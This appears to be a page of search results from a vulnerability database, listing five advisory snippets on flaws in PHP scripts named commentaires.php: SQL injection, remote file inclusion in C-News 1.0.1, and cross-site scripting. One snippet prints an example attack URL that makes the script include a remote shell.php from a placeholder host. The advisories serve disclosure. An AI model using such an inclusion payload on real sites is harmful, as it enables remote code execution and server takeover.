5 matches found
SQL injection
SQL injection vulnerability in commentaires.php in Crazy Goomba 1.2.1 allows remote attackers to execute arbitrary SQL commands via the id parameter...
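C-News Commentaires.PHP Remote File Inclusion Vulnerability
C-News is a PHP-based news management program. C-News does not properly filter user-submitted URI data, so a remote attacker can exploit the vulnerability to execute arbitrary commands with the privileges of the web process. The problem is that the 'Commentaires.PHP' script does not filter the user-submitted 'path' parameter; supplying a malicious remote server as the include target can lead to arbitrary PHP code being executed with the privileges of the web process. C-News C-News 1.0.1 http://www.c-news.fr/ http://www.example.com/Script Path/affichage/commentaires.php?path=http://www.example2.com/shell.php...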
C-News <= 1.0.1 (path) Remote File Inclusion Vulnerability
No description provided by source. C-News = v1.0.1 path Remote File Inclusion Exploit. Critical Level :...
C-News 1.0.1 - path Remote File Inclusion
C-News 1.0.1 - path Remote File Inclusion. C-News = v1.0.1 path Remote File Inclusion Exploit. Critical Leve...
CVE-2005-1975
Multiple cross-site scripting (XSS) vulnerabilities in Annuaire 1Two 1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the id parameter to index.php, or the (2) siteid, (3) nom, (4) email, or (5) commentaire parameters in commentaires.php...